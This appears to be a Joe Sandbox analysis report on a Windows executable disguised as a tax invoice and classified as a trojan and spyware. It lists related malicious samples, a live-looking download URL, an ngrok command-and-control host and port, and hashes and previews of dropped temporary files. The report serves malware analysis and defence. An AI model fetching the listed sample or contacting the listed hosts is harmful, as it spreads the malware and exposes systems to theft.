Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/33@5/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 0.8% (good quality ratio 0.6%) Quality average: 51.6% Quality standard deviation: 34.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 60 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:27:51	API Interceptor	98x Sleep call for process: P90GT_Invoice_Related_Property_Tax_P800.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
18.192.93.86	http://www.sdrclm.cn/vendor/phpdocumentor/P800/P90GT_Invoice_Related_Property_Tax_P800.exe	Get hash	malicious	Browse	2.tcp.eu.ngrok.io:17685/
18.197.239.5	3RG3H9olQ6.exe	Get hash	malicious	Browse
	sSbfd9HBxa.exe	Get hash	malicious	Browse
	TRELakPzu5.exe	Get hash	malicious	Browse
	wYSS64j1d3.exe	Get hash	malicious	Browse
	23rQ7vse.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
2.tcp.eu.ngrok.io	lId8irQvRB.exe	Get hash	malicious	Browse	3.127.138.57
	http://www.sdrclm.cn/vendor/phpdocumentor/P800/P90GT_Invoice_Related_Property_Tax_P800.exe	Get hash	malicious	Browse	18.156.13.209
	3RG3H9olQ6.exe	Get hash	malicious	Browse	18.192.93.86
	sSbfd9HBxa.exe	Get hash	malicious	Browse	18.156.13.209
	TRELakPzu5.exe	Get hash	malicious	Browse	18.156.13.209
	wYSS64j1d3.exe	Get hash	malicious	Browse	18.197.239.5
	nUt8Eiji.exe	Get hash	malicious	Browse	18.157.68.73
	23rQ7vse.exe	Get hash	malicious	Browse	18.157.68.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	CIQ-PO162688.js	Get hash	malicious	Browse	3.64.163.50
	j4wsBJ6J38.exe	Get hash	malicious	Browse	3.124.188.36
	CIQ-PO116266.js	Get hash	malicious	Browse	52.17.43.61
	CIQ-PO16266.js	Get hash	malicious	Browse	52.17.85.125
	cRZoCso1ZT.dll	Get hash	malicious	Browse	35.73.5.155
	CIQ-PO162667.js	Get hash	malicious	Browse	52.17.85.125
	lId8irQvRB.exe	Get hash	malicious	Browse	18.156.13.209
	http://www.centranum.com	Get hash	malicious	Browse	13.226.244.103
	Advance Payment-pdf.exe	Get hash	malicious	Browse	44.227.76.166
	https://manchesterawning.dudaone.com/	Get hash	malicious	Browse	3.67.141.185
	http://document--1111011111.company.com/	Get hash	malicious	Browse	52.25.131.159
	DocuSign base.apk	Get hash	malicious	Browse	99.84.146.42
	Swift Copy05262020.pdf.exe	Get hash	malicious	Browse	52.53.48.146
	TM57812337.exe	Get hash	malicious	Browse	3.124.188.36
	https://businessadmin.org/	Get hash	malicious	Browse	52.41.81.16
	https://docsend.com/view/8nh5ucwpx9wr55u7	Get hash	malicious	Browse	52.38.13.34
	http://a.top4top.io	Get hash	malicious	Browse	3.68.169.133
	TT COPY Euro 57,890_CI0099484_pdf.vbs	Get hash	malicious	Browse	13.250.255.10
	KnQmnTMdif.exe	Get hash	malicious	Browse	3.13.191.225
	bankslip.exe	Get hash	malicious	Browse	3.124.188.36

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2502
Entropy (8bit):	5.3347050065951125
Encrypted:	false
SSDEEP:	48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHjHK1HG1qHxa:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo63
MD5:	E4CBA4D8B8F8701DE1330B47443D3F46
SHA1:	0BE7109CF4CF15565F3CE5CAFD0A598DD73C7AAF
SHA-256:	AD2C8D2A2C7CF46C14F429F9CDA428BB21E50D536331DFF00B519A1F0F79C6F8
SHA-512:	C15312D3849657F726D8E021CDC076DDCBE85C77FD3D1519871C3B7F0B429FC3A64E965B01ED80266CBAF80DB70B2591CD70A3FC2F634F8DE9016982C436A2C9
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Temp\tmp2A94.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3162.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\Temp\tmp32B5.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3534.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\Temp\tmp35CE.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4258.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694269844633945
Encrypted:	false
SSDEEP:	24:8fZFmL9j6Vqvtvrd45sdmW5rRO2KEceUJEcnD1:8RFmL9wqY5qmW5VvcpJEq
MD5:	5E40B4BAF83E9A23A02D6AB379018ADE
SHA1:	47E1914E79AF5D1C90B201FA9A2470A6DDE0D2D0
SHA-256:	E4A221B66518E711FA910625864F36100572A341B05960B3A01889E6393860AF
SHA-512:	50B4FC17B8E6A3D6F2AE7E79BC928ECF02344807B7C0103D91C9C9B01846D3026F377511B8792658587CED392F303F3B325DACD669554055A3C4E778E64A5CA9
Malicious:	false
Preview:	MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBETIIANYRONFSQFBHEGJISEQSPFKPRSEZHTQOXRPUKTEUQJYBYNQULHXLSRXNENUVTORORBUHFHDFSRJFI

C:\Users\user\AppData\Local\Temp\tmp5787.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp65E.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp66C6.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\Temp\tmp696B.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\Temp\tmp6F19.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp72A.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7923.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp79AB.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
